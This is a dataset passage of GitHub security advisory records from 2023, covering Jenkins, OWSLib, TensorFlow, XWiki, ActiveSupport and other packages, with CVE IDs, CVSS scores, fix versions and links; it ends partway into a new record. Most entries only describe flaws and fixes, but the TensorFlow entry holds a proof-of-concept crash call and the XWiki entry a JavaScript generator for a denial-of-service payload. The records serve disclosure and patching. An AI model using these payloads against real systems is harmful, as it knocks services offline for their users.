{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-31T22:42:21Z', 'nvd_published_at': '2023-03-31T02:15:00Z'}
|
1.4.0
|
GHSA-frgr-c5f2-8qhh
|
2023-05-23T20:46:25Z
|
2023-03-10T21:30:19Z
| null |
['CVE-2023-27900']
|
Denial of service in Jenkins Core
|
Jenkins 2.393 and earlier, LTS 2.375.3 and earlier, and prior to LTS 2.387.1 is affected by the Apache Commons FileUpload library’s vulnerability CVE-2023-24998. This library is used to process uploaded files via the Stapler web framework (usually through StaplerRequest#getFile) and MultipartFormDataParser in Jenkins.
This allows attackers to cause a denial of service (DoS) by sending crafted requests to HTTP endpoints processing file uploads.
Jenkins 2.394, LTS 2.375.4, and LTS 2.387.1 limits the number of request parts to be processed to 1000. Specific endpoints receiving only simple form submissions have a lower limit.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.main:jenkins-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.388'}, {'fixed': '2.394'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.main:jenkins-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.375.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.main:jenkins-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.376'}, {'fixed': '2.387.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27900'}, {'type': 'WEB', 'url': 'https://github.com/CVEProject/cvelist/blob/master/2023/27xxx/CVE-2023-27900.json'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-03-08/#SECURITY-3030'}]
|
{'cwe_ids': ['CWE-770'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-17T14:44:42Z', 'nvd_published_at': '2023-03-10T21:15:00Z'}
|
1.4.0
|
GHSA-8h9c-r582-mggc
|
2023-03-20T14:00:04Z
|
2023-03-07T20:41:36Z
| null |
['CVE-2023-27476']
|
OWSLib vulnerable to XML External Entity (XXE) Injection
|
### Impact
OWSLib's XML parser (which supports both `lxml` and `xml.etree`) does not disable entity resolution for `lxml`, and could lead to arbitrary file reads from an attacker-controlled XML payload. This affects all XML parsing in the codebase.
### Patches
- Use only lxml for XML handling, adding `resolve_entities=False` to `lxml`'s parser: https://github.com/geopython/OWSLib/pull/863
### Workarounds
```python
patch_well_known_namespaces(etree)
etree.set_default_parser(
parser=etree.XMLParser(resolve_entities=False)
)
```
### References
- [`GHSL-2022-131`](https://securitylab.github.com/advisories/GHSL-2022-131_OWSLib/)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'OWSLib'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.28.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/geopython/OWSLib/security/advisories/GHSA-8h9c-r582-mggc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27476'}, {'type': 'WEB', 'url': 'https://github.com/geopython/OWSLib/pull/863'}, {'type': 'WEB', 'url': 'https://github.com/geopython/OWSLib/pull/863/commits/b92687702be9576c0681bb11cad21eb631b9122f'}, {'type': 'PACKAGE', 'url': 'https://github.com/geopython/OWSLib'}, {'type': 'WEB', 'url': 'https://github.com/geopython/OWSLib/releases/tag/0.28.1'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/owslib/PYSEC-2023-86.yaml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/06/msg00032.html'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2022-131_owslib/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5426'}]
|
{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-07T20:41:36Z', 'nvd_published_at': '2023-03-08T00:15:00Z'}
|
1.4.0
|
GHSA-g8xm-p2h4-v6jp
|
2023-04-04T15:24:49Z
|
2023-03-24T21:30:48Z
| null |
['CVE-2021-3684']
|
OpenShift Assisted Installer leaks image pull secrets as plaintext in installation logs
|
A vulnerability was found in OpenShift Assisted Installer. During generation of the Discovery ISO, image pull secrets were leaked as plaintext in the installation logs. An authenticated user could exploit this by re-using the image pull secret to pull container images from the registry as the associated user.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/openshift/assisted-installer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.25.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3684'}, {'type': 'WEB', 'url': 'https://github.com/openshift/assisted-installer/commit/2403dad3795406f2c5d923af0894e07bc8b0bdc4'}, {'type': 'WEB', 'url': 'https://github.com/openshift/assisted-installer/commit/f3800cfa3d64ce6dcd6f7b73f0578bb99bfdaf7a'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1985962'}, {'type': 'PACKAGE', 'url': 'https://github.com/openshift/assisted-installer'}]
|
{'cwe_ids': ['CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T21:59:18Z', 'nvd_published_at': '2023-03-24T20:15:00Z'}
|
1.4.0
|
GHSA-49rq-hwc3-x77w
|
2023-03-30T22:17:27Z
|
2023-03-24T21:55:32Z
| null |
['CVE-2023-25670']
|
TensorFlow has Null Pointer Error in QuantizedMatMulWithBiasAndDequantize
|
### Impact
NPE in QuantizedMatMulWithBiasAndDequantize with MKL enable
```python
import tensorflow as tf
func = tf.raw_ops.QuantizedMatMulWithBiasAndDequantize
para={'a': tf.constant(138, dtype=tf.quint8), 'b': tf.constant(4, dtype=tf.qint8), 'bias': [[31.81644630432129, 47.21876525878906], [109.95201110839844, 152.07968139648438]], 'min_a': 141.5337138686371, 'max_a': [73.84139251708984, 173.15280151367188], 'min_b': [], 'max_b': [[16.128345489501953, 193.26820373535156]], 'min_freezed_output': [], 'max_freezed_output': [115.50032806396484, 156.974853515625], 'Toutput': 1.0, 'transpose_a': True, 'transpose_b': False, 'input_quant_mode': 'MIN_FIRST'}
func(**para)
```
### Patches
We have patched the issue in GitHub commit [8a47a39d9697969206d23a523c977238717e8727](https://github.com/tensorflow/tensorflow/commit/8a47a39d9697969206d23a523c977238717e8727).
The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by r3pwnx
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-49rq-hwc3-x77w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25670'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/8a47a39d9697969206d23a523c977238717e8727'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]
|
{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T21:55:32Z', 'nvd_published_at': '2023-03-25T00:15:00Z'}
|
1.4.0
|
GHSA-6w5f-5wgr-qjg5
|
2023-03-09T20:21:36Z
|
2023-03-09T20:21:36Z
| null |
[]
|
Constellation allows Emergency shell access during initramfs boot phase
|
### Impact
An active attacker could let the boot fail on purpose in the initramfs, dropping the serial console into an emergency shell. This gives attackers with access to the serial console full control over the VM.
### Patches
The issue has been patched in [v2.6.0](https://github.com/edgelesssys/constellation/releases/tag/v2.6.0).
### Workarounds
none
|
[]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/edgelesssys/constellation/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/edgelesssys/constellation/security/advisories/GHSA-6w5f-5wgr-qjg5'}, {'type': 'PACKAGE', 'url': 'https://github.com/edgelesssys/constellation'}, {'type': 'WEB', 'url': 'https://github.com/edgelesssys/constellation/releases/tag/v2.6.0'}]
|
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-09T20:21:36Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-273w-7fxj-pcp6
|
2023-03-13T15:35:50Z
|
2023-03-06T21:30:18Z
| null |
['CVE-2021-36395']
|
Moodle vulnerable to Uncontrolled Resource Consumption
|
In Moodle, the file repository's URL parsing required additional recursion handling to mitigate the risk of recursion denial of service.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.11.0-beta'}, {'fixed': '3.11.1'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.10.0-beta'}, {'fixed': '3.10.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.8'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36395'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=424801'}]
|
{'cwe_ids': ['CWE-400', 'CWE-674'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-07T20:57:09Z', 'nvd_published_at': '2023-03-06T21:15:00Z'}
|
1.4.0
|
GHSA-pj73-v5mw-pm9j
|
2023-03-15T21:36:01Z
|
2023-03-15T21:36:01Z
| null |
['CVE-2023-28120']
|
Possible XSS Security Vulnerability in SafeBuffer#bytesplice
|
There is a vulnerability in ActiveSupport if the new bytesplice method is called on a SafeBuffer with untrusted user input.
This vulnerability has been assigned the CVE identifier CVE-2023-28120.
Versions Affected: All. Not affected: None Fixed Versions: 7.0.4.3, 6.1.7.3
# Impact
ActiveSupport uses the SafeBuffer string subclass to tag strings as html_safe after they have been sanitized.
When these strings are mutated, the tag is should be removed to mark them as no longer being html_safe.
Ruby 3.2 introduced a new bytesplice method which ActiveSupport did not yet understand to be a mutation.
Users on older versions of Ruby are likely unaffected.
All users running an affected release and using bytesplice should either upgrade or use one of the workarounds immediately.
# Workarounds
Avoid calling bytesplice on a SafeBuffer (html_safe) string with untrusted user input.
|
[]
|
[{'package': {'ecosystem': 'RubyGems', 'name': 'activesupport'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.4.3'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'activesupport'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.1.7.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28120'}, {'type': 'WEB', 'url': 'https://discuss.rubyonrails.org/t/cve-2023-28120-possible-xss-security-vulnerability-in-safebuffer-bytesplice/82469'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/activesupport/CVE-2023-28120.yml'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-15T21:36:01Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-86jq-pwgx-6vrq
|
2023-03-23T18:20:49Z
|
2023-03-17T12:30:40Z
| null |
['CVE-2023-1463']
|
Improper Authorization in nilsteampassnet/teampass
|
Improper Authorization in GitHub repository nilsteampassnet/teampass prior to 3.0.0.23.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'nilsteampassnet/teampass'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.0.23'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1463'}, {'type': 'WEB', 'url': 'https://github.com/nilsteampassnet/teampass/commit/4e06fbaf2b78c3615d0599855a72ba7e31157516'}, {'type': 'PACKAGE', 'url': 'https://github.com/nilsteampassnet/TeamPass'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/f6683c3b-a0f2-4615-b639-1920c8ae12e6'}]
|
{'cwe_ids': ['CWE-285', 'CWE-639'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-17T18:23:40Z', 'nvd_published_at': '2023-03-17T12:15:00Z'}
|
1.4.0
|
GHSA-5cf8-vrr8-8hjm
|
2023-03-03T22:47:49Z
|
2023-03-03T22:47:49Z
| null |
['CVE-2023-26476']
|
XWiki Platform packages Expose Sensitive Information to an Unauthorized Actor
|
### Impact
Users can deduce the content of the password fields by repeated call to `LiveTableResults` and `WikisLiveTableResultsMacros`.
### Patches
The issue is applied on versions 14.7-rc-1, 13.4.4, and 13.10.9.
### Workarounds
The issue can be fixed by upgrading to versions 14.7-rc-1, 13.4.4, and 13.10.9 and higher, or in version >= 3.2M3 by applying the patch manually on `LiveTableResults` and `WikisLiveTableResultsMacros`.
### References
- Jira: https://jira.xwiki.org/browse/XWIKI-19949
- Patch: https://github.com/xwiki/xwiki-platform/commit/7f8825537c9523ccb5051abd78014d156f9791c8
### For more information
If you have any questions or comments about this advisory:
- Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
- Email us at [Security Mailing List](mailto:security@xwiki.org)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-livetable-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2-m3'}, {'fixed': '13.4.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-wiki-ui-mainwiki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2-m3'}, {'fixed': '13.4.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-livetable-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '13.5.0'}, {'fixed': '13.10.9'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-wiki-ui-mainwiki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '13.5.0'}, {'fixed': '13.10.9'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-livetable-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0.0'}, {'fixed': '14.7-rc-1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-wiki-ui-mainwiki'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0.0'}, {'fixed': '14.7-rc-1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-5cf8-vrr8-8hjm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26476'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/7f8825537c9523ccb5051abd78014d156f9791c8'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-19949'}]
|
{'cwe_ids': ['CWE-200', 'CWE-307'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T22:47:49Z', 'nvd_published_at': '2023-03-02T19:15:00Z'}
|
1.4.0
|
GHSA-3xmp-jwrr-8f4r
|
2023-05-24T15:21:40Z
|
2023-03-14T03:30:18Z
| null |
['CVE-2023-24279']
|
ONOS vulnerable to reflected cross-site scripting
|
A cross-site scripting (XSS) vulnerability in Open Network Operating System (ONOS) from version v1.9.0 to v2.7.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the URL parameter of the API documentation dashboard under info > contact > URL.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.onosproject:onos-archetypes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.9.0'}, {'last_affected': '2.7.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24279'}, {'type': 'PACKAGE', 'url': 'https://github.com/opennetworkinglab/onos'}, {'type': 'WEB', 'url': 'https://www.edoardoottavianelli.it/'}, {'type': 'WEB', 'url': 'https://www.edoardoottavianelli.it/CVE-2023-24279'}, {'type': 'WEB', 'url': 'https://www.edoardoottavianelli.it/CVE-2023-24279/index.html'}, {'type': 'WEB', 'url': 'https://www.youtube.com/watch?v=1mSXzzwcGMM'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-24T15:21:40Z', 'nvd_published_at': '2023-03-14T01:15:00Z'}
|
1.4.0
|
GHSA-wxwq-525w-hcqx
|
2023-03-03T23:05:28Z
|
2023-03-03T23:05:28Z
| null |
[]
|
Yapscan Denial of Service vulnerability in report server
|
### Impact
If you use the report server, it may be vulnerable to a Denial of Service attack.
### Patches
Has been patched in v0.19.2.
### References
The vulnerability was inherited by the following upstream vulnerabilites
- [golang.org/x/text < v0.3.7](https://github.com/advisories/GHSA-ppp9-7jff-5vj2)
- [golang.org/x/net < 0.0.0-20220906165146-f3363e06e74c](https://github.com/advisories/GHSA-69cg-p879-7622)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/fkie-cad/yapscan'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.18.0'}, {'fixed': '0.19.2'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/fkie-cad/yapscan/security/advisories/GHSA-wxwq-525w-hcqx'}, {'type': 'WEB', 'url': 'https://github.com/fkie-cad/yapscan/pull/46'}, {'type': 'WEB', 'url': 'https://github.com/fkie-cad/yapscan/commit/242b4b25b107deacddd4ca276b45d23e16bb3b88'}, {'type': 'WEB', 'url': 'https://github.com/fkie-cad/yapscan/commit/65f277662c6475eb3f592e0e4fdfee902ecd9326'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-69cg-p879-7622'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-ppp9-7jff-5vj2'}, {'type': 'PACKAGE', 'url': 'https://github.com/fkie-cad/yapscan'}, {'type': 'WEB', 'url': 'https://github.com/fkie-cad/yapscan/releases/tag/v0.19.2'}]
|
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T23:05:28Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-fjrv-vx9m-4jpj
|
2023-04-05T20:19:51Z
|
2023-03-28T21:30:20Z
| null |
['CVE-2023-25722']
|
Veracode Scan Jenkins Plugin vulnerable to information disclosure
|
Veracode Scan Jenkins Plugin before 23.3.19.0, when configured for remote agent jobs, invokes the Veracode Java API Wrapper in a manner that allows local users (with OS-level access of the Jenkins remote) to discover Veracode API credentials by listing the process and its arguments.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.veracode.jenkins:veracode-scan'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '23.3.19.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25722'}, {'type': 'WEB', 'url': 'https://community.veracode.com/s/global-search/CVE-2023-25722'}, {'type': 'WEB', 'url': 'https://docs.veracode.com/updates/r/c_all_int#veracode-jenkins-plugin-233190'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/veracode-scan-plugin'}, {'type': 'WEB', 'url': 'https://veracode.com'}]
|
{'cwe_ids': ['CWE-214'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-05T20:19:51Z', 'nvd_published_at': '2023-03-28T20:15:00Z'}
|
1.4.0
|
GHSA-3hvj-3cg9-v242
|
2023-03-13T19:18:39Z
|
2023-03-02T23:04:10Z
| null |
['CVE-2023-26052']
|
Saleor Unauthenticated Information Disclosure Vulnerability via Python Exceptions
|
### Impact
Some internal Python exceptions are not handled properly and thus are returned in API as error messages. Some messages might contain sensitive information like infrastructure details in unauthenticated requests.
Affected versions: Saleor ≥ 2.0.0
### Workarounds
None
### For more information
If you have any questions or comments about this advisory:
* Open a discussion at https://github.com/saleor/saleor/discussions
* Email us at [hello@saleor.io](mailto:hello@saleor.io)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'saleor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '3.1.48'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'saleor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.11.0'}, {'fixed': '3.11.12'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'saleor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.10.0'}, {'fixed': '3.10.14'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'saleor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.9.0'}, {'fixed': '3.9.27'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'saleor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.8.0'}, {'fixed': '3.8.30'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'saleor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.7.0'}, {'fixed': '3.7.59'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/saleor/saleor/security/advisories/GHSA-3hvj-3cg9-v242'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26052'}, {'type': 'PACKAGE', 'url': 'https://github.com/saleor/saleor'}, {'type': 'WEB', 'url': 'https://github.com/saleor/saleor/releases/tag/3.1.48'}, {'type': 'WEB', 'url': 'https://github.com/saleor/saleor/releases/tag/3.10.14'}, {'type': 'WEB', 'url': 'https://github.com/saleor/saleor/releases/tag/3.11.12'}, {'type': 'WEB', 'url': 'https://github.com/saleor/saleor/releases/tag/3.7.59'}, {'type': 'WEB', 'url': 'https://github.com/saleor/saleor/releases/tag/3.8.30'}, {'type': 'WEB', 'url': 'https://github.com/saleor/saleor/releases/tag/3.9.27'}]
|
{'cwe_ids': ['CWE-209'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-03-02T23:04:10Z', 'nvd_published_at': '2023-03-02T19:15:00Z'}
|
1.4.0
|
GHSA-hfxp-j95j-cwrp
|
2023-03-13T15:25:39Z
|
2023-03-06T18:30:22Z
| null |
['CVE-2023-1197']
|
uvdesk/community-skeleton vulnerable to Stored Cross-site Scripting
|
Cross-site Scripting (XSS) - Stored in GitHub repository uvdesk/community-skeleton prior to 1.1.0.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'uvdesk/community-skeleton'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1197'}, {'type': 'WEB', 'url': 'https://github.com/uvdesk/community-skeleton/commit/6fae9442361c8a216611d3622bec26249a8c48a0'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/97d226ea-2cd8-4f4d-9360-aa46c37fdd26'}, {'type': 'PACKAGE', 'url': 'uvdesk/community-skeleton'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-07T20:56:10Z', 'nvd_published_at': '2023-03-06T16:15:00Z'}
|
1.4.0
|
GHSA-52vf-hvv3-98h7
|
2023-03-03T22:53:35Z
|
2023-03-03T22:53:35Z
| null |
['CVE-2023-26479']
|
xwiki vulnerable to Improper Handling of Exceptional Conditions
|
### Impact
Users with write rights can insert well-formed content that is not handled well by the parser. For instance, with `xwiki/2.1`, inserting a deeply nested group blocks (`((( ((( ((( ((( .... ))) ))) ))) )))` (see the generator below to produce a large payload) can lead to the parser throwing a `StackOverflowError`.
As a consequence, some pages becomes unusable, including:
- the user index (if the page containing the faulty content is a user page)
- the page index
Note that on the page, the normal UI is completely missing and it is not possible to open the editor directly to revert the change as the stack overflow is already triggered while getting the title of the document. This means that it is quite difficult to remove this content once inserted.
### Patches
This has been patched on XWiki 13.10.10, 14.4.6, and 14.9-rc-1.
### Workarounds
A temporary solution to avoid Stack Overflow errors is to increase the memory allocated to the stack by using the `-Xss` JVM parameter (e.g., `-Xss32m`). This should allow the parser to pass and to fix the faulty content.
Note that we did not evaluated the consequence on other aspects of the system (e.g., performances), and should be only be used as a temporary solution.
Also, this does not prevent the issue to occur again with another content.
Consequently, it is strongly advised to upgrade to a version where the issue has been patched.
### References
- https://jira.xwiki.org/browse/XWIKI-19838
### For more information
If you have any questions or comments about this advisory:
- Open an issue in [Jira](http://jira.xwiki.org/)
- Email us at [Security ML](mailto:security@xwiki.org)
### Payload Generator
The Javascript code below produces 32768 nested group blocks, around the `Hello` text.
```javascript
let result = "(((\nHello\n)))";
for (let i = 0; i < 15; ++i) {
result = result.replace("Hello", result);
}
console.log(result);
```
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-rendering-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0'}, {'fixed': '13.10.10'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-rendering-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0'}, {'fixed': '14.4.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-rendering-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.9-rc-1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-52vf-hvv3-98h7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26479'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/e5b82cd98072464196a468b8f7fe6396dce142a7'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-19838'}]
|
{'cwe_ids': ['CWE-755'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T22:53:35Z', 'nvd_published_at': '2023-03-02T18:15:00Z'}
|
1.4.0
|
GHSA-fcmm-54jp-7vf6
|
2023-03-28T18:58:12Z
|
2023-03-21T22:31:30Z
| null |
['CVE-2023-28431']
|
